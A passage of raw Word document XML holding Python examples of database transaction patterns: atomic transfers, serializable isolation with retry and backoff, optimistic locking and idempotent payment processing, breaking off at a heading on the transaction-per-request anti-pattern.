        <w:t xml:space="preserve">        if from_account.balance &lt; amount:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6886BA63" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            raise InsufficientFundsError(f"Balance {from_account.balance} &lt; {amount}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A95763" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628A2843" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        db.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69376E20" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            "UPDATE accounts SET balance = balance - %s WHERE id = %s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E88AF06" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            [amount, from_account_id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAF3426" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58706DC5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        db.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3001D8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            "UPDATE accounts SET balance = balance + %s WHERE id = %s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C3AF29" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            [amount, to_account_id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56237CC1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A75CF2E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499F41A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        db.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21363B80" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            "INSERT INTO transfer_log (from_id, to_id, amount, status) VALUES (%s, %s, %s, 'completed')",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38955DDD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            [from_account_id, to_account_id, amount]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553EC23F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AED85B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    # COMMIT happens here — all three operations atomically committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF035C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="6620B444" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t># Pattern 2: Serializable isolation for complex invariants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB0785C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>def claim_doctor_on_call(doctor_id: int, hospital_id: int):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00062B3B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    with db.transaction(isolation_level='SERIALIZABLE'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B526B1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        # Under SERIALIZABLE: if another transaction modifies on_call data concurrently,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A06E1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        # one of us will get a serialization error and must retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06BE2B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        on_call_count = db.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BA7CD7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            """SELECT COUNT(*) FROM on_call </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5442CF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">               WHERE hospital_id = %s AND status = 'active'""",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6493DF08" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            [hospital_id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E01BF6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        ).scalar()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9D6EFB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B75905" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        if on_call_count &lt;= 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DED361" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            raise BusinessError("Cannot release last on-call doctor")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6023C7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F496694" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        db.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF11B13" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            "UPDATE on_call SET status = 'released' WHERE doctor_id = %s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8838A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            [doctor_id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCB2498" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38479E6E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="2E95B92E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t># Pattern 3: Retry on serialization failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EDDDAC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005DDFA9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5A1782" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="1744AA27" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>def with_serializable_retry(operation, max_retries=3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40404673" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    for attempt in range(max_retries):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDB9106" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E579EED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            return operation()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5278946E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        except SerializationFailure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E331D9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            if attempt == max_retries - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC55A3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                raise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6DEECF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            # Exponential backoff with jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176F5591" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            backoff = (2 ** attempt) * 0.1 + random.uniform(0, 0.05)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25325167" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            time.sleep(backoff)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166998F7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1DE636" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>with_serializable_retry(lambda: claim_doctor_on_call(doctor_id, hospital_id))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5215A572" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="2378DBC2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t># Pattern 4: Optimistic locking with version check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E93770B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>def update_product_price(product_id: int, new_price: Decimal, expected_version: int):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4ACB79" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    rows_affected = db.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126C98C8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        """UPDATE products </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2DF07E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           SET price = %s, version = version + 1, updated_at = NOW()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7008AF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           WHERE id = %s AND version = %s""",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510A059A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [new_price, product_id, expected_version]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0885D198" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    ).rowcount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C6763C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B29040" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    if rows_affected == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554A06B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        raise ConcurrentModificationError(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B1969" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            f"Product {product_id} was modified since version {expected_version}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2ACA9B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB60B8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AA4678" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    db.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E11FC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="76E4A059" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t># Pattern 5: Idempotent transactions with idempotency keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE87DB1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>def process_payment(payment_id: str, amount: Decimal, idempotency_key: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612ABB34" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    with db.transaction():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5C93CE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        # Check if already processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9F1E7A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        existing = db.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C610397" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            "SELECT status, result FROM payment_results WHERE idempotency_key = %s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D38674" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            [idempotency_key]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD9FEBB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        ).fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0E5009" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532125BC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        if existing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B18D8A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            return existing.result  # Return cached result (idempotent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8FC4B7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A9BAB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        # Process payment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB293E9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        result = payment_gateway.charge(payment_id, amount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE1329B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065F1970" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        # Store result with idempotency key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095F88DA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        db.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3111B849" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            """INSERT INTO payment_results (idempotency_key, status, result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD79EFD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">               VALUES (%s, %s, %s)""",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB1AE9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            [idempotency_key, result.status, json.dumps(result)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05445608" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A52E46" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ED0434" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC71163" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    # Atomic: result stored with idempotency key in same transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F2DC47" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    # Retry with same key: returns cached result without reprocessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F97D69" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The transaction-per-request anti-pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D1B75" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
